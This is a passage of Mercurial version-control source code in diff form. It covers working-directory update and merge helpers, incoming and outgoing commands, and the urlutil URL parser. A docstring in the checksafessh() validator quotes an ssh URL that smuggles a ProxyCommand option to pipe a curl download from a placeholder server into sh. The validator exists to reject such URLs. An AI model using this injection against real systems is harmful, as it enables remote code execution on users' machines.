        'labels': [b'working copy', b'destination'],
        'updatecheck': updatecheck,
    }
    return mergemod._update(repo, node, **kwargs)
1104
1104
1105
1105
def update(repo, node, quietempty=False, updatecheck=None):
    """update the working directory to node"""
    ctx = repo[node]
    stats = mergemod.update(ctx, updatecheck=updatecheck)
    _showstats(repo, stats, quietempty)
    unresolved = stats.unresolvedcount
    if unresolved:
        repo.ui.status(_(b"use 'hg resolve' to retry unresolved file merges\n"))
    # True when the caller must deal with leftover merge conflicts.
    return unresolved > 0
1113
1113
1114
1114
# naming conflict in clone(): clone() takes an `update` argument that shadows
# this module-level function, so keep an underscore-prefixed alias for it.
_update = update
1117
1117
1118
1118
def clean(repo, node, show_stats=True, quietempty=False):
    """forcibly switch the working directory to node, clobbering changes"""
    target = repo[node]
    stats = mergemod.clean_update(target)
    # A discarding update can never leave files unresolved.
    assert stats.unresolvedcount == 0
    if show_stats:
        _showstats(repo, stats, quietempty)
    # Mirror update()'s contract: False means "no unresolved conflicts".
    return False
1126
1126
1127
1127
# naming conflict in updatetotally(): its `clean` argument shadows this
# module-level function, so keep an underscore-prefixed alias for it.
_clean = clean
1130
1130
# The accepted values for the `updatecheck` argument of updatetotally();
# anything else falls back to the configured/linear default.
_VALID_UPDATECHECKS = {
    mergemod.UPDATECHECK_ABORT,
    mergemod.UPDATECHECK_NONE,
    mergemod.UPDATECHECK_LINEAR,
    mergemod.UPDATECHECK_NO_CONFLICT,
}
1137
1137
1138
1138
def updatetotally(ui, repo, checkout, brev, clean=False, updatecheck=None):
    """Update the working directory with extra care for non-file components

    This takes care of non-file components below:

    :bookmark: might be advanced or (in)activated

    This takes arguments below:

    :checkout: to which revision the working directory is updated
    :brev: a name, which might be a bookmark to be activated after updating
    :clean: whether changes in the working directory can be discarded
    :updatecheck: how to deal with a dirty working directory

    Valid values for updatecheck are the UPDATECHECK_* constants
    defined in the merge module. Passing `None` will result in using the
    configured default.

    * ABORT: abort if the working directory is dirty
    * NONE: don't check (merge working directory changes into destination)
    * LINEAR: check that update is linear before merging working directory
      changes into destination
    * NO_CONFLICT: check that the update does not result in file merges

    This returns whether conflict is detected at updating or not.
    """
    if updatecheck is None:
        updatecheck = ui.config(b'commands', b'update.check')
        if updatecheck not in _VALID_UPDATECHECKS:
            # If not configured, or invalid value configured
            updatecheck = mergemod.UPDATECHECK_LINEAR
    # an explicit (caller-supplied) value must be valid, however
    if updatecheck not in _VALID_UPDATECHECKS:
        raise ValueError(
            r'Invalid updatecheck value %r (can accept %r)'
            % (updatecheck, _VALID_UPDATECHECKS)
        )
    with repo.wlock():
        movemarkfrom = None
        warndest = False
        if checkout is None:
            # no explicit destination: let destutil pick one (and possibly
            # a bookmark to move along with the update)
            updata = destutil.destupdate(repo, clean=clean)
            checkout, movemarkfrom, brev = updata
            warndest = True

        if clean:
            ret = _clean(repo, checkout)
        else:
            if updatecheck == mergemod.UPDATECHECK_ABORT:
                # the dirtiness check happened here, so the low-level update
                # no longer needs to check anything
                cmdutil.bailifchanged(repo, merge=False)
                updatecheck = mergemod.UPDATECHECK_NONE
            ret = _update(repo, checkout, updatecheck=updatecheck)

        if not ret and movemarkfrom:
            if movemarkfrom == repo[b'.'].node():
                pass  # no-op update
            elif bookmarks.update(repo, [movemarkfrom], repo[b'.'].node()):
                b = ui.label(repo._activebookmark, b'bookmarks.active')
                ui.status(_(b"updating bookmark %s\n") % b)
            else:
                # this can happen with a non-linear update
                b = ui.label(repo._activebookmark, b'bookmarks')
                ui.status(_(b"(leaving bookmark %s)\n") % b)
                bookmarks.deactivate(repo)
        elif brev in repo._bookmarks:
            # the destination name is an existing bookmark: activate it
            if brev != repo._activebookmark:
                b = ui.label(brev, b'bookmarks.active')
                ui.status(_(b"(activating bookmark %s)\n") % b)
            bookmarks.activate(repo, brev)
        elif brev:
            # named destination that is not a bookmark: deactivate any
            # currently-active bookmark
            if repo._activebookmark:
                b = ui.label(repo._activebookmark, b'bookmarks')
                ui.status(_(b"(leaving bookmark %s)\n") % b)
            bookmarks.deactivate(repo)

        if warndest:
            destutil.statusotherdests(ui, repo)

    return ret
1217
1217
1218
1218
def merge(
    ctx,
    force=False,
    remind=True,
    labels=None,
):
    """Merge the working directory with *ctx*, resolving changes.

    Returns True when any file merges were left unresolved, False
    otherwise.
    """
    repo = ctx.repo()
    stats = mergemod.merge(ctx, force=force, labels=labels)
    _showstats(repo, stats)
    unresolved = stats.unresolvedcount > 0
    if unresolved:
        repo.ui.status(
            _(
                b"use 'hg resolve' to retry unresolved file merges "
                b"or 'hg merge --abort' to abandon\n"
            )
        )
    elif remind:
        repo.ui.status(_(b"(branch merge, don't forget to commit)\n"))
    return unresolved
1240
1240
1241
1241
def abortmerge(ui, repo):
    """Abandon an in-progress merge and restore the pre-merge parent."""
    ms = mergestatemod.mergestate.read(repo)
    # A merge with conflicts leaves an active mergestate recording the local
    # side; a conflict-free merge stores nothing, so '.' already is the
    # revision to go back to.
    node = ms.localctx.hex() if ms.active() else repo[b'.'].hex()

    repo.ui.status(_(b"aborting the merge, updating back to %s\n") % node[:12])
    stats = mergemod.clean_update(repo[node])
    # a clean (discarding) update can never leave unresolved files behind
    assert stats.unresolvedcount == 0
    _showstats(repo, stats)
1255
1255
1256
1256
def _incoming(
    displaychlist, subreporecurse, ui, repo, source, opts, buffered=False
):
    """
    Helper for incoming / gincoming.

    displaychlist gets called with
    (remoterepo, incomingchangesetlist, displayer) parameters,
    and is supposed to contain only code that can't be unified.

    Returns 0 when incoming changes were found, otherwise the result of
    subreporecurse().
    """
    srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
    srcs = list(srcs)
    if len(srcs) != 1:
        # use a bytes literal, consistent with every other _() call in this
        # module (Mercurial handles all user-facing strings as bytes)
        msg = _(b'for now, incoming supports only a single source, %d provided')
        msg %= len(srcs)
        raise error.Abort(msg)
    source, branches = srcs[0]
    other = peer(repo, opts, source)
    cleanupfn = other.close
    try:
        ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source))
        revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))

        if revs:
            revs = [other.lookup(rev) for rev in revs]
        # getremotechanges may replace `other` with a bundle repo and hands
        # back the matching cleanup callable
        other, chlist, cleanupfn = bundlerepo.getremotechanges(
            ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
        )

        if not chlist:
            ui.status(_(b"no changes found\n"))
            return subreporecurse()
        ui.pager(b'incoming')
        displayer = logcmdutil.changesetdisplayer(
            ui, other, opts, buffered=buffered
        )
        displaychlist(other, chlist, displayer)
        displayer.close()
    finally:
        cleanupfn()
    subreporecurse()
    return 0  # exit code is zero since we found incoming changes
1298
1298
1299
1299
def incoming(ui, repo, source, opts):
    """Show changesets that would be pulled from ``source``.

    Returns 0 when incoming changes were found, 1 otherwise (possibly
    lowered by subrepository results when --subrepos is given).
    """

    def subreporecurse():
        # recurse into subrepositories; the combined exit status is the
        # minimum ("success wins") of the individual results
        ret = 1
        if opts.get(b'subrepos'):
            ctx = repo[None]
            for subpath in sorted(ctx.substate):
                sub = ctx.sub(subpath)
                ret = min(ret, sub.incoming(ui, source, opts))
        return ret

    def display(other, chlist, displayer):
        # show incoming changesets, honoring --limit / --newest-first /
        # --no-merges
        limit = logcmdutil.getlimit(opts)
        if opts.get(b'newest_first'):
            chlist.reverse()
        count = 0
        for n in chlist:
            if limit is not None and count >= limit:
                break
            parents = [p for p in other.changelog.parents(n) if p != nullid]
            if opts.get(b'no_merges') and len(parents) == 2:
                continue
            count += 1
            displayer.show(other[n])

    return _incoming(display, subreporecurse, ui, repo, source, opts)
1325
1325
1326
1326
def _outgoing(ui, repo, dests, opts, subpath=None):
    """Compute the changesets missing from the given push destinations.

    :subpath: optional subrepository path grafted onto each destination
              (absolute subpaths replace the destination entirely).

    Returns (outgoing_revs, others) where outgoing_revs is the union of
    missing nodes across all destinations, sorted by local revision number,
    and others is the list of opened peers.  The caller is responsible for
    closing those peers.
    """
    out = set()
    others = []
    for path in urlutil.get_push_paths(repo, ui, dests):
        dest = path.pushloc or path.loc
        if subpath is not None:
            # Use a local variable here: rebinding `subpath` itself would
            # hand a url object (instead of bytes) to urlutil.url() on the
            # second iteration when several destinations are given.
            sub_url = urlutil.url(subpath)
            if sub_url.isabs():
                dest = bytes(sub_url)
            else:
                p = urlutil.url(dest)
                p.path = os.path.normpath(b'%s/%s' % (p.path, sub_url))
                dest = bytes(p)
        branches = path.branch, opts.get(b'branch') or []

        ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
        revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
        if revs:
            revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]

        other = peer(repo, opts, dest)
        try:
            outgoing = discovery.findcommonoutgoing(
                repo, other, revs, force=opts.get(b'force')
            )
            o = outgoing.missing
            out.update(o)
            if not o:
                scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
            others.append(other)
        except:  # re-raises
            other.close()
            raise
    # make sure this is ordered by revision number
    outgoing_revs = list(out)
    cl = repo.changelog
    outgoing_revs.sort(key=cl.rev)
    return outgoing_revs, others
1365
1365
1366
1366
def _outgoing_recurse(ui, repo, dests, opts):
    """Run outgoing on every subrepository; return the minimum exit code."""
    status = 1
    if not opts.get(b'subrepos'):
        return status
    wctx = repo[None]
    for name in sorted(wctx.substate):
        status = min(status, wctx.sub(name).outgoing(ui, dests, opts))
    return status
1375
1375
1376
1376
def _outgoing_filter(repo, revs, opts):
    """apply revision filtering/ordering option for outgoing

    Generator over the nodes in `revs`, honoring --limit, --no-merges and
    --newest-first.  Note that --newest-first reverses `revs` in place.
    """
    limit = logcmdutil.getlimit(opts)
    no_merges = opts.get(b'no_merges')
    if opts.get(b'newest_first'):
        revs.reverse()
    if limit is None and not no_merges:
        # nothing to filter: pass everything straight through
        for node in revs:
            yield node
        return

    cl = repo.changelog
    emitted = 0
    for node in revs:
        if limit is not None and emitted >= limit:
            break
        if no_merges:
            parent_nodes = [p for p in cl.parents(node) if p != nullid]
            if len(parent_nodes) == 2:
                continue
        emitted += 1
        yield node
1398
1398
1399
1399
def outgoing(ui, repo, dests, opts, subpath=None):
    """Show changesets not found in the given destination(s).

    Returns 0 when outgoing changes exist, 1 otherwise (possibly lowered
    by subrepository results when --subrepos is given).
    """
    if opts.get(b'graph'):
        logcmdutil.checkunsupportedgraphflags([], opts)
    o, others = _outgoing(ui, repo, dests, opts, subpath=subpath)
    ret = 1
    try:
        if o:
            ret = 0

            if opts.get(b'graph'):
                revdag = logcmdutil.graphrevs(repo, o, opts)
                ui.pager(b'outgoing')
                displayer = logcmdutil.changesetdisplayer(
                    ui, repo, opts, buffered=True
                )
                logcmdutil.displaygraph(
                    ui, repo, revdag, displayer, graphmod.asciiedges
                )
            else:
                ui.pager(b'outgoing')
                displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
                for n in _outgoing_filter(repo, o, opts):
                    displayer.show(repo[n])
                displayer.close()
        # hooks and subrepo recursion run even when nothing is outgoing
        for oth in others:
            cmdutil.outgoinghooks(ui, repo, oth, opts, o)
        ret = min(ret, _outgoing_recurse(ui, repo, dests, opts))
        return ret  # exit code is zero since we found outgoing changes
    finally:
        # always close the peers opened by _outgoing()
        for oth in others:
            oth.close()
1431
1431
1432
1432
def verify(repo, level=None):
    """verify the consistency of a repository

    Runs the core verification (verifymod) and additionally checks that
    .hgsubstate references resolvable subrepositories.  Returns the
    combined status (non-zero indicates a problem).
    """
    ret = verifymod.verify(repo, level=level)

    # Broken subrepo references in hidden csets don't seem worth worrying about,
    # since they can't be pushed/pulled, and --hidden can be used if they are a
    # concern.

    # pathto() is needed for -R case
    revs = repo.revs(
        b"filelog(%s)", util.pathto(repo.root, repo.getcwd(), b'.hgsubstate')
    )

    if revs:
        repo.ui.status(_(b'checking subrepo links\n'))
        for rev in revs:
            ctx = repo[rev]
            try:
                for subpath in ctx.substate:
                    try:
                        # a failing subrepo verify fails the whole run, but
                        # keep checking the remaining subrepos
                        ret = (
                            ctx.sub(subpath, allowcreate=False).verify() or ret
                        )
                    except error.RepoError as e:
                        repo.ui.warn(b'%d: %s\n' % (rev, e))
            except Exception:
                # reading ctx.substate blew up: the file itself is corrupt
                repo.ui.warn(
                    _(b'.hgsubstate is corrupt in revision %s\n')
                    % short(ctx.node())
                )

    return ret
1465
1465
1466
1466
def remoteui(src, opts):
    """Build a ui for remote interaction from *src* (a ui or a repo).

    Repo-specific configuration is dropped; ssh, bundle, auth/security and
    proxy settings are carried over, with command line *opts* taking
    precedence for the ssh/remotecmd knobs.
    """
    if util.safehasattr(src, b'baseui'):
        # a repository was passed: start from its global (non-repo) config
        remote = src.baseui.copy()
        src = src.ui
    else:
        # a plain ui object: keep all of its global options
        remote = src.copy()

    # ssh transport knobs: explicit command line options win over config
    for key in (b'ssh', b'remotecmd'):
        value = opts.get(key) or src.config(b'ui', key)
        if value:
            remote.setconfig(b"ui", key, value, b'copied')

    # remember the main repository root for bundle repos
    root = src.config(b'bundle', b'mainreporoot')
    if root:
        remote.setconfig(b'bundle', b'mainreporoot', root, b'copied')

    # carry over authentication / security / proxy sections wholesale
    for sect in (b'auth', b'hostfingerprints', b'hostsecurity', b'http_proxy'):
        for key, val in src.configitems(sect):
            remote.setconfig(sect, key, val, b'copied')
    cacerts = src.config(b'web', b'cacerts')
    if cacerts:
        remote.setconfig(
            b'web', b'cacerts', util.expandpath(cacerts), b'copied'
        )

    return remote
1495
1495
1496
1496
# Files of interest
# Used to check if the repository has changed looking at mtime and size of
# these files.  Each entry is (repo attribute giving the directory, filename).
foi = [
    (b'spath', b'00changelog.i'),
    (b'spath', b'phaseroots'),  # ! phase can change content at the same size
    (b'spath', b'obsstore'),
    (b'path', b'bookmarks'),  # ! bookmark can change content at the same size
]
1506
1506
1507
1507
class cachedlocalrepo(object):
    """Holds a localrepository that can be cached and reused."""

    def __init__(self, repo):
        """Create a new cached repo from an existing repo.

        We assume the passed in repo was recently created. If the
        repo has changed between when it was created and when it was
        turned into a cache, it may not refresh properly.
        """
        assert isinstance(repo, localrepo.localrepository)
        self._repo = repo
        # fingerprint of the files-of-interest (see `foi`) used to detect
        # on-disk changes, plus the newest mtime among them
        self._state, self.mtime = self._repostate()
        self._filtername = repo.filtername

    def fetch(self):
        """Refresh (if necessary) and return a repository.

        If the cached instance is out of date, it will be recreated
        automatically and returned.

        Returns a tuple of the repo and a boolean indicating whether a new
        repo instance was created.
        """
        # We compare the mtimes and sizes of some well-known files to
        # determine if the repo changed. This is not precise, as mtimes
        # are susceptible to clock skew and imprecise filesystems and
        # file content can change while maintaining the same size.

        state, mtime = self._repostate()
        if state == self._state:
            return self._repo, False

        repo = repository(self._repo.baseui, self._repo.url())
        # preserve the view (filter) of the cached instance
        if self._filtername:
            self._repo = repo.filtered(self._filtername)
        else:
            self._repo = repo.unfiltered()
        self._state = state
        self.mtime = mtime

        return self._repo, True

    def _repostate(self):
        """Return (fingerprint, max_mtime) for the files of interest.

        The fingerprint is a tuple of (mtime, size) pairs, one per entry
        in `foi`; when a file is missing, the containing directory is
        stat'ed instead so its later creation is still noticed.
        """
        state = []
        maxmtime = -1
        for attr, fname in foi:
            prefix = getattr(self._repo, attr)
            p = os.path.join(prefix, fname)
            try:
                st = os.stat(p)
            except OSError:
                # file may not exist yet (e.g. no obsstore): fall back to
                # the directory itself
                st = os.stat(prefix)
            state.append((st[stat.ST_MTIME], st.st_size))
            maxmtime = max(maxmtime, st[stat.ST_MTIME])

        return tuple(state), maxmtime

    def copy(self):
        """Obtain a copy of this class instance.

        A new localrepository instance is obtained. The new instance should be
        completely independent of the original.
        """
        repo = repository(self._repo.baseui, self._repo.origroot)
        if self._filtername:
            repo = repo.filtered(self._filtername)
        else:
            repo = repo.unfiltered()
        c = cachedlocalrepo(repo)
        # share the already-computed fingerprint so the copy does not
        # consider itself stale immediately
        c._state = self._state
        c.mtime = self.mtime
        return c
@@ -1,712 +1,719 b''
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Return the port for a given network service.

    An integer (or a string of digits) is returned unchanged.  Any other
    string is resolved through socket.getservbyname(); an unknown
    service name raises error.Abort.
    """
    try:
        return int(port)
    except ValueError:
        # Not numeric: fall through to a service-name lookup.
        pass

    service = pycompat.sysstr(port)
    try:
        return socket.getservbyname(service)
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )
51
51
52
52
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # Characters left unescaped when quoting user/passwd components.
    _safechars = b"!~*'()+"
    # Characters left unescaped when quoting path/fragment components.
    _safepchars = b"/!~*'()+:\\"
    # Matches a leading "<scheme>:" prefix.
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        # Keep the raw input so localpath()/islocal() can fall back to it.
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return an independent copy of this url object."""
        u = url(b'temporary useless value')
        u.path = self.path
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url_without_credentials, urllib-style authinfo)``."""
        user, passwd = self.user, self.passwd
        try:
            # Temporarily strip credentials to render the bare URL.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
395 )
396
396
397
397
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with an URL scheme."""
    parsed = url(path)
    return bool(parsed.scheme)  # cast to help pytype
401
401
402
402
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` begins with a Windows drive letter ("X:")."""
    if not path:
        return False
    return path[0:1].isalpha() and path[1:2] == b':'
406
406
407
407
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local-filesystem form of ``path`` (query/fragment kept)."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
411
411
412
412
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    unquoted = urlreq.unquote(path)
    # A leading "-" right after the scheme would be parsed by ssh as an
    # option rather than a host name.
    if unquoted.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(unquoted),)
        )
429
429
430
430
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438
438
439
439
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
446
446
447
447
def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`"""
    if dests:
        for dest in dests:
            yield ui.getpath(dest)
        return
    # No explicit destination: fall back to the configured defaults,
    # preferring `default-push` over `default`.
    for fallback in (b'default-push', b'default'):
        if fallback in ui.paths:
            yield ui.paths[fallback]
            return
    raise error.ConfigError(
        _(b'default repository not configured!'),
        hint=_(b"see 'hg help config.paths'"),
    )
463
463
464
464
def get_pull_paths(repo, ui, sources, default_branches=()):
    """yields all the `(path, branch)` selected as pull source by `sources`"""
    # Avoid shadowing the module-level ``url`` class with a local name.
    for source in sources or [b'default']:
        expanded = ui.expandpath(source)
        yield parseurl(expanded, default_branches)
472
472
473
473
def get_clone_path(ui, source, default_branches=()):
    """return the `(origsource, path, branch)` selected as clone source"""
    # Avoid shadowing the module-level ``url`` class with a local name.
    expanded = ui.expandpath(source)
    path, branch = parseurl(expanded, default_branches)
    return expanded, path, branch
479
480
def parseurl(path, branches=None):
    '''parse url#branch, returning (url, (branch, branches))'''
    u = url(path)
    if u.fragment:
        # A non-empty fragment names the branch; strip it from the URL.
        branch, u.fragment = u.fragment, None
    else:
        branch = None
    return bytes(u), (branch, branches or [])
482
489
483
490
class paths(dict):
    """Represents a collection of paths and their configs.

    Data is initially derived from ui instances and the config files they have
    loaded.
    """

    def __init__(self, ui):
